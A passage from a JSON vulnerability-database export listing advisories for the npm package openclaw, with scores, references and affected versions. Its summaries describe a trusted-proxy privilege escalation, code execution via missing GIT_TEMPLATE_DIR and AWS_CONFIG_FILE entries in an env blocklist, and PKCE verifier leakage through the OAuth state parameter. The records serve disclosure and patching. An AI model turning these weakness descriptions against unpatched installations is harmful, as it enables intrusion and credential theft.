ID-u1ru-vdfp-x3hu"},{"vulnerability":"VCID-u6hw-ffpj-4yd9"},{"vulnerability":"VCID-u9cw-crg5-1kbs"},{"vulnerability":"VCID-u9ja-dgsh-yug2"},{"vulnerability":"VCID-una1-gxkk-t3bp"},{"vulnerability":"VCID-uy97-p1ex-y7df"},{"vulnerability":"VCID-v1bp-hw9a-yffz"},{"vulnerability":"VCID-v91b-1nmx-ckcx"},{"vulnerability":"VCID-v9cd-65tf-p3f8"},{"vulnerability":"VCID-vktg-77tu-vycv"},{"vulnerability":"VCID-vm8g-hrvu-quhm"},{"vulnerability":"VCID-vqrj-z6tx-rff2"},{"vulnerability":"VCID-vtqt-bgz7-yub6"},{"vulnerability":"VCID-vx5d-3d98-7kf3"},{"vulnerability":"VCID-vy8v-np82-r3b5"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2rd-2j4p-gfgw"},{"vulnerability":"VCID-w2tj-nqa6-cuam"},{"vulnerability":"VCID-w4p1-sxdg-hyha"},{"vulnerability":"VCID-w58d-6veg-uugy"},{"vulnerability":"VCID-watb-49vx-yub1"},{"vulnerability":"VCID-wfkm-7ayk-uuhb"},{"vulnerability":"VCID-wkye-je9r-1fba"},{"vulnerability":"VCID-wmr3-83u3-6qdb"},{"vulnerability":"VCID-wut7-y72y-9ucb"},{"vulnerability":"VCID-wwcu-de9t-d3ca"},{"vulnerability":"VCID-wyce-qxau-mqff"},{"vulnerability":"VCID-x2ru-ydpv-f3ah"},{"vulnerability":"VCID-x4hn-ygbg-mkep"},{"vulnerability":"VCID-x794-wfnf-1ugf"},{"vulnerability":"VCID-x7uw-s9a6-fybd"},{"vulnerability":"VCID-x9qg-8qk5-s3d6"},{"vulnerability":"VCID-xdr6-tfsy-rqeu"},{"vulnerability":"VCID-xfgw-ua7r-abbr"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xnvm-rp36-vyaj"},{"vulnerability":"VCID-xpr3-hg3h-z3bz"},{"vulnerability":"VCID-xryt-a83q-q7et"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-xux6-be95-e7ec"},{"vulnerability":"VCID-xvhd-w4tv-tqhr"},{"vulnerability":"VCID-xyck-sspa-4ba2"},{"vulnerability":"VCID-xz8s-hj5s-wfgj"},{"vulnerability":"VCID-xzg5-ren5-p7gw"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-y7sd-j9xn-qffs"},{"vulnerability":"VCID-y8jc-h9ft-auge"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ykwt-tdpa-3bft"},{"vulnerability":"VCID-ymmv-2qmq-6kap"},{"vulnerability":"VCID-ynup-4v9e-tbh4"},{"vulnerability":"VCID-yp2w-pc58-9bf6"},{"vulnerability":"VCID-ywrn-52gx-f3ad"},{"vulnerability":"VCID-z3rc-xpx7-fkcu"},{"vulnerability":"VCID-z7wa-tw2t-vqas"},{"vulnerability":"VCID-z8mj-pnbe-wqej"},{"vulnerability":"VCID-zac2-wjyt-27af"},{"vulnerability":"VCID-zb5t-hhkm-kfeh"},{"vulnerability":"VCID-zf3q-78js-k7ce"},{"vulnerability":"VCID-zg68-u5b5-vkft"},{"vulnerability":"VCID-zhpy-h2b2-ekd8"},{"vulnerability":"VCID-zkum-rn42-yyfs"},{"vulnerability":"VCID-zpb1-e3g9-vkbh"},{"vulnerability":"VCID-zpte-tgt5-wqcm"},{"vulnerability":"VCID-zu4s-jnn3-1kd8"},{"vulnerability":"VCID-zunq-wnnf-k3fw"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.11"}],"aliases":["CVE-2026-32977","GHSA-xvx8-77m6-gwg6"],"risk_score":3.1,"exploitability":"0.5","weighted_severity":"6.2","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-b7hq-mrhg-b3bk"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/89033?format=json","vulnerability_id":"VCID-b9w3-w2nq-cqg6","summary":"OpenClaw: Incomplete scope-clearing fix allows operator.admin escalation via trusted-proxy auth mode\n## Summary\nIncomplete scope-clearing fix allows operator.admin escalation via trusted-proxy auth mode\n\n## Current Maintainer Triage\n- Normalized severity: high\n- Assessment: v2026.3.28 still misses trusted-proxy scope clearing for non-Control-UI clients, so self-declared operator scopes can survive on a real identity-bearing auth path; the complete fix is unreleased.\n\n## Affected Packages / Versions\n- Package: `openclaw` (npm)\n- Latest published npm version: `2026.3.31`\n- Vulnerable version range: `<=2026.3.28`\n- Patched versions: `>= 2026.3.31`\n- First stable tag containing the fix: `v2026.3.31`\n\n## Fix Commit(s)\n- `8b88b927cb0747ad24d95b07d35682bf85dc5b0e` — 2026-03-30T14:19:00+01:00\n\nOpenClaw thanks @north-echo for reporting.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-41404","reference_id":"","reference_type":"","scores":[{"value":"0.00114","scoring_system":"epss","scoring_elements":"0.29702","published_at":"2026-06-05T12:55:00Z"},{"value":"0.00114","scoring_system":"epss","scoring_elements":"0.29632","published_at":"2026-06-07T12:55:00Z"},{"value":"0.00114","scoring_system":"epss","scoring_elements":"0.29665","published_at":"2026-06-06T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-41404"},{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"8.6","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/openclaw/openclaw/commit/8b88b927cb0747ad24d95b07d35682bf85dc5b0e","reference_id":"","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"7.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"8.6","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-04-29T14:38:09Z/"}],"url":"https://github.com/openclaw/openclaw/commit/8b88b927cb0747ad24d95b07d35682bf85dc5b0e"},{"reference_url":"https://github.com/openclaw/openclaw/releases/tag/v2026.3.31","reference_id":"","reference_type":"","scores":[{"value":"8.6","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/releases/tag/v2026.3.31"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-g374-mggx-p6xc","reference_id":"","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"7.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"8.6","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-04-29T14:38:09Z/"}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-g374-mggx-p6xc"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-41404","reference_id":"CVE-2026-41404","reference_type":"","scores":[],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-41404"},{"reference_url":"https://github.com/advisories/GHSA-g374-mggx-p6xc","reference_id":"GHSA-g374-mggx-p6xc","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-g374-mggx-p6xc"},{"reference_url":"https://www.vulncheck.com/advisories/openclaw-operator-admin-privilege-escalation-via-trusted-proxy-authentication","reference_id":"openclaw-operator-admin-privilege-escalation-via-trusted-proxy-authentication","reference_type":"","scores":[{"value":"8.8","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"7.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N"},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-04-29T14:38:09Z/"}],"url":"https://www.vulncheck.com/advisories/openclaw-operator-admin-privilege-escalation-via-trusted-proxy-authentication"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/109907?format=json","purl":"pkg:npm/openclaw@2026.3.31","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1pbz-8rnx-dkhe"},{"vulnerability":"VCID-258k-a4dw-tfae"},{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2h6a-becf-x7ej"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-356u-h788-pkgt"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-3zwq-dz2u-pqgv"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-4urc-4536-pqhk"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-733f-57ds-xugm"},{"vulnerability":"VCID-73cz-n29z-uqem"},{"vulnerability":"VCID-75yr-sbce-nkah"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-7ntr-5dr5-9uf8"},{"vulnerability":"VCID-7snr-fn3u-x3b8"},{"vulnerability":"VCID-7z2s-k6ty-ekg1"},{"vulnerability":"VCID-96jd-x87b-s3ey"},{"vulnerability":"VCID-9hcd-uj62-8yeu"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-9xgq-vtg2-jucq"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-arks-g6hw-abbw"},{"vulnerability":"VCID-bgwh-spue-yybk"},{"vulnerability":"VCID-bkya-73v8-bber"},{"vulnerability":"VCID-c25h-khws-2fc3"},{"vulnerability":"VCID-cbuu-4d6c-rben"},{"vulnerability":"VCID-d8v2-gft5-buee"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-dmse-bb22-rkcj"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-e4ac-qm17-qbf5"},{"vulnerability":"VCID-fuda-zxu8-gbb4"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-haxd-ps1x-h3ch"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kxmf-d7w1-xfcv"},{"vulnerability":"VCID-ma62-gtan-97au"},{"vulnerability":"VCID-mszk-dr24-xugw"},{"vulnerability":"VCID-mv8b-cryt-u3g8"},{"vulnerability":"VCID-mxu5-yjqs-nuap"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-ns77-4wfj-9ka6"},{"vulnerability":"VCID-ntwt-jkgr-sffu"},{"vulnerability":"VCID-nv6g-7gs9-pfan"},{"vulnerability":"VCID-nw4r-wjgs-8qc1"},{"vulnerability":"VCID-p7gx-9usz-yyew"},{"vulnerability":"VCID-p7v5-jqhq-nbhz"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-pae5-uyu7-k3c1"},{"vulnerability":"VCID-pdmd-a4fg-8fcg"},{"vulnerability":"VCID-pj41-sunw-vbcj"},{"vulnerability":"VCID-psms-gauf-tkbz"},{"vulnerability":"VCID-q6ne-sw1r-xkd1"},{"vulnerability":"VCID-qedr-a3ay-v3gx"},{"vulnerability":"VCID-qjss-tvgk-3ubk"},{"vulnerability":"VCID-r5bw-c2py-9udf"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-una1-gxkk-t3bp"},{"vulnerability":"VCID-v9cd-65tf-p3f8"},{"vulnerability":"VCID-vfbb-bpy9-87ey"},{"vulnerability":"VCID-vy8v-np82-r3b5"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2tj-nqa6-cuam"},{"vulnerability":"VCID-w4p1-sxdg-hyha"},{"vulnerability":"VCID-w58d-6veg-uugy"},{"vulnerability":"VCID-wmr3-83u3-6qdb"},{"vulnerability":"VCID-wyce-qxau-mqff"},{"vulnerability":"VCID-x2ru-ydpv-f3ah"},{"vulnerability":"VCID-xfgw-ua7r-abbr"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xnvm-rp36-vyaj"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-y7sd-j9xn-qffs"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ymmv-2qmq-6kap"},{"vulnerability":"VCID-z8mj-pnbe-wqej"},{"vulnerability":"VCID-zg68-u5b5-vkft"},{"vulnerability":"VCID-zpte-tgt5-wqcm"},{"vulnerability":"VCID-zu4s-jnn3-1kd8"},{"vulnerability":"VCID-zunq-wnnf-k3fw"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.31"}],"aliases":["CVE-2026-41404","GHSA-g374-mggx-p6xc"],"risk_score":4.0,"exploitability":"0.5","weighted_severity":"8.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-b9w3-w2nq-cqg6"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/91029?format=json","vulnerability_id":"VCID-bg1d-gmxy-wkc6","summary":"OpenClaw host-env blocklist missing `GIT_TEMPLATE_DIR` and `AWS_CONFIG_FILE` allows code execution via env override\n## Summary\n\nHost execution env sanitization did not block `GIT_TEMPLATE_DIR` or `AWS_CONFIG_FILE`, even though both can redirect trusted tooling to attacker-controlled content.\n\n## Impact\n\nAn approved exec request could redirect git or AWS CLI behavior through attacker-controlled configuration and execute untrusted code or load attacker-selected credentials.\n\n## Affected Component\n\n`src/infra/host-env-security-policy.json, src/infra/host-env-security.ts`\n\n## Fixed Versions\n\n- Affected: `<= 2026.3.24`\n- Patched: `>= 2026.3.28`\n- Latest stable `2026.3.28` contains the fix.\n\n## Fix\n\nFixed by commit `6eb82fba3c` (`Infra: block additional host exec env keys`).\n\nOpenClaw thanks @nicky-cc of Tencent zhuque Lab [https://github.com/Tencent/AI-Infra-Guard](https://github.com/Tencent/AI-Infra-Guard) for reporting.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-41332","reference_id":"","reference_type":"","scores":[{"value":"0.0002","scoring_system":"epss","scoring_elements":"0.05589","published_at":"2026-06-05T12:55:00Z"},{"value":"0.0002","scoring_system":"epss","scoring_elements":"0.05576","published_at":"2026-06-07T12:55:00Z"},{"value":"0.0002","scoring_system":"epss","scoring_elements":"0.05574","published_at":"2026-06-06T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-41332"},{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"4.9","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/openclaw/openclaw/commit/6eb82fba3cbfd0e50b179c1fada92e1e22dce7fa","reference_id":"","reference_type":"","scores":[{"value":"4.9","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/commit/6eb82fba3cbfd0e50b179c1fada92e1e22dce7fa"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-m866-6qv5-p2fg","reference_id":"","reference_type":"","scores":[{"value":"4.9","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:L/I:L/A:N"},{"value":"5.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:L/I:H/A:N"},{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"5.8","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:H/AT:N/PR:L/UI:N/VC:L/VI:H/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-24T16:46:25Z/"}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-m866-6qv5-p2fg"},{"reference_url":"https://www.vulncheck.com/advisories/openclaw-code-execution-via-missing-environment-variable-blocklist","reference_id":"","reference_type":"","scores":[{"value":"4.9","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:L/I:L/A:N"},{"value":"5.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:L/I:H/A:N"},{"value":"5.8","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:L/AC:H/AT:N/PR:L/UI:N/VC:L/VI:H/VA:N/SC:N/SI:N/SA:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-24T16:46:25Z/"}],"url":"https://www.vulncheck.com/advisories/openclaw-code-execution-via-missing-environment-variable-blocklist"},{"reference_url":"https://github.com/advisories/GHSA-m866-6qv5-p2fg","reference_id":"GHSA-m866-6qv5-p2fg","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-m866-6qv5-p2fg"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/109863?format=json","purl":"pkg:npm/openclaw@2026.3.28","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1j3m-fecr-f7cn"},{"vulnerability":"VCID-1p5p-eth5-3ufu"},{"vulnerability":"VCID-1pbz-8rnx-dkhe"},{"vulnerability":"VCID-258k-a4dw-tfae"},{"vulnerability":"VCID-26kp-dbu2-pqej"},{"vulnerability":"VCID-26sg-e29u-hkf3"},{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2h6a-becf-x7ej"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-2uqu-k42d-1baq"},{"vulnerability":"VCID-2wr9-h42m-a7ev"},{"vulnerability":"VCID-356u-h788-pkgt"},{"vulnerability":"VCID-38g8-39ek-xbat"},{"vulnerability":"VCID-3wsw-d4z2-dydt"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-3zwq-dz2u-pqgv"},{"vulnerability":"VCID-3zx4-t8cj-kbfn"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-4hz5-f2pw-3yb4"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-4urc-4536-pqhk"},{"vulnerability":"VCID-5rgx-2krs-guck"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-733f-57ds-xugm"},{"vulnerability":"VCID-73cz-n29z-uqem"},{"vulnerability":"VCID-75yr-sbce-nkah"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-7dyw-9b37-yqh4"},{"vulnerability":"VCID-7ntr-5dr5-9uf8"},{"vulnerability":"VCID-7snr-fn3u-x3b8"},{"vulnerability":"VCID-7wmr-v7zb-6fc9"},{"vulnerability":"VCID-7z2s-k6ty-ekg1"},{"vulnerability":"VCID-96jd-x87b-s3ey"},{"vulnerability":"VCID-9hcd-uj62-8yeu"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-9xgq-vtg2-jucq"},{"vulnerability":"VCID-9xrt-mv81-3yc8"},{"vulnerability":"VCID-a2wx-7b8h-c3h1"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-arks-g6hw-abbw"},{"vulnerability":"VCID-axp9-mt9z-gkgw"},{"vulnerability":"VCID-b9w3-w2nq-cqg6"},{"vulnerability":"VCID-bgwh-spue-yybk"},{"vulnerability":"VCID-bkya-73v8-bber"},{"vulnerability":"VCID-c25h-khws-2fc3"},{"vulnerability":"VCID-c4yt-z48z-zygv"},{"vulnerability":"VCID-c76v-4577-n7c6"},{"vulnerability":"VCID-carm-gpgh-wbbf"},{"vulnerability":"VCID-cbuu-4d6c-rben"},{"vulnerability":"VCID-cvmw-sxfq-dyhz"},{"vulnerability":"VCID-d8v2-gft5-buee"},{"vulnerability":"VCID-da47-zdf1-mfgf"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-dmse-bb22-rkcj"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-e4ac-qm17-qbf5"},{"vulnerability":"VCID-fekn-d6f3-xfa6"},{"vulnerability":"VCID-fuda-zxu8-gbb4"},{"vulnerability":"VCID-g3hg-peh1-tudm"},{"vulnerability":"VCID-g8r6-x6s5-uydq"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-haxd-ps1x-h3ch"},{"vulnerability":"VCID-hd4w-s3dp-nubj"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-j8fb-fhyc-33fu"},{"vulnerability":"VCID-jdqk-kv8u-xqa9"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kxmf-d7w1-xfcv"},{"vulnerability":"VCID-kzgh-7f6h-kfd1"},{"vulnerability":"VCID-ma62-gtan-97au"},{"vulnerability":"VCID-mcz5-wgu1-z7g7"},{"vulnerability":"VCID-mszk-dr24-xugw"},{"vulnerability":"VCID-mv8b-cryt-u3g8"},{"vulnerability":"VCID-mxu5-yjqs-nuap"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-ns77-4wfj-9ka6"},{"vulnerability":"VCID-ntwt-jkgr-sffu"},{"vulnerability":"VCID-nv6g-7gs9-pfan"},{"vulnerability":"VCID-nw4r-wjgs-8qc1"},{"vulnerability":"VCID-p7gx-9usz-yyew"},{"vulnerability":"VCID-p7me-4bzz-83cm"},{"vulnerability":"VCID-p7v5-jqhq-nbhz"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-pae5-uyu7-k3c1"},{"vulnerability":"VCID-pdmd-a4fg-8fcg"},{"vulnerability":"VCID-psms-gauf-tkbz"},{"vulnerability":"VCID-q6ne-sw1r-xkd1"},{"vulnerability":"VCID-q9jf-srt4-fbcg"},{"vulnerability":"VCID-qedr-a3ay-v3gx"},{"vulnerability":"VCID-qjss-tvgk-3ubk"},{"vulnerability":"VCID-r5bw-c2py-9udf"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-s3wz-3yzf-ybhz"},{"vulnerability":"VCID-sja9-6t41-hud8"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-t991-75e7-ykdv"},{"vulnerability":"VCID-una1-gxkk-t3bp"},{"vulnerability":"VCID-uy97-p1ex-y7df"},{"vulnerability":"VCID-v9cd-65tf-p3f8"},{"vulnerability":"VCID-vfbb-bpy9-87ey"},{"vulnerability":"VCID-vktg-77tu-vycv"},{"vulnerability":"VCID-vx5d-3d98-7kf3"},{"vulnerability":"VCID-vy8v-np82-r3b5"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2tj-nqa6-cuam"},{"vulnerability":"VCID-w4p1-sxdg-hyha"},{"vulnerability":"VCID-w58d-6veg-uugy"},{"vulnerability":"VCID-watb-49vx-yub1"},{"vulnerability":"VCID-wmr3-83u3-6qdb"},{"vulnerability":"VCID-wx44-n3fr-skah"},{"vulnerability":"VCID-wyce-qxau-mqff"},{"vulnerability":"VCID-x2ru-ydpv-f3ah"},{"vulnerability":"VCID-x4hn-ygbg-mkep"},{"vulnerability":"VCID-x794-wfnf-1ugf"},{"vulnerability":"VCID-x7uw-s9a6-fybd"},{"vulnerability":"VCID-xfgw-ua7r-abbr"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xnvm-rp36-vyaj"},{"vulnerability":"VCID-xryt-a83q-q7et"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-xvhd-w4tv-tqhr"},{"vulnerability":"VCID-xz8s-hj5s-wfgj"},{"vulnerability":"VCID-xzg5-ren5-p7gw"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-y7sd-j9xn-qffs"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ykwt-tdpa-3bft"},{"vulnerability":"VCID-ymmv-2qmq-6kap"},{"vulnerability":"VCID-ynup-4v9e-tbh4"},{"vulnerability":"VCID-yp2w-pc58-9bf6"},{"vulnerability":"VCID-ywrn-52gx-f3ad"},{"vulnerability":"VCID-z7wa-tw2t-vqas"},{"vulnerability":"VCID-z8mj-pnbe-wqej"},{"vulnerability":"VCID-zb5t-hhkm-kfeh"},{"vulnerability":"VCID-zg68-u5b5-vkft"},{"vulnerability":"VCID-zkum-rn42-yyfs"},{"vulnerability":"VCID-zpte-tgt5-wqcm"},{"vulnerability":"VCID-zu4s-jnn3-1kd8"},{"vulnerability":"VCID-zunq-wnnf-k3fw"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.28"}],"aliases":["CVE-2026-41332","GHSA-m866-6qv5-p2fg"],"risk_score":3.1,"exploitability":"0.5","weighted_severity":"6.2","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-bg1d-gmxy-wkc6"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/89289?format=json","vulnerability_id":"VCID-bgwh-spue-yybk","summary":"OpenClaw: Gemini OAuth exposed the PKCE verifier through the OAuth state parameter\n## Summary\n\nBefore OpenClaw 2026.4.2, the Gemini OAuth flow reused the PKCE verifier as the OAuth `state` value. Because the provider reflected `state` back in the redirect URL, the verifier could be exposed alongside the authorization code.\n\n## Impact\n\nAnyone who could capture the redirect URL could learn both the authorization code and the PKCE verifier, defeating PKCE's interception protection for that flow and enabling token redemption.\n\n## Affected Packages / Versions\n\n- Package: `openclaw` (npm)\n- Affected versions: `<= 2026.4.1`\n- Patched versions: `>= 2026.4.2`\n- Latest published npm version: `2026.4.1`\n\n## Fix Commit(s)\n\n- `a26f4d0f3ef0757db6c6c40277cc06a5de76c52f` — separate OAuth state from the PKCE verifier\n\nOpenClaw thanks @BG0ECV for 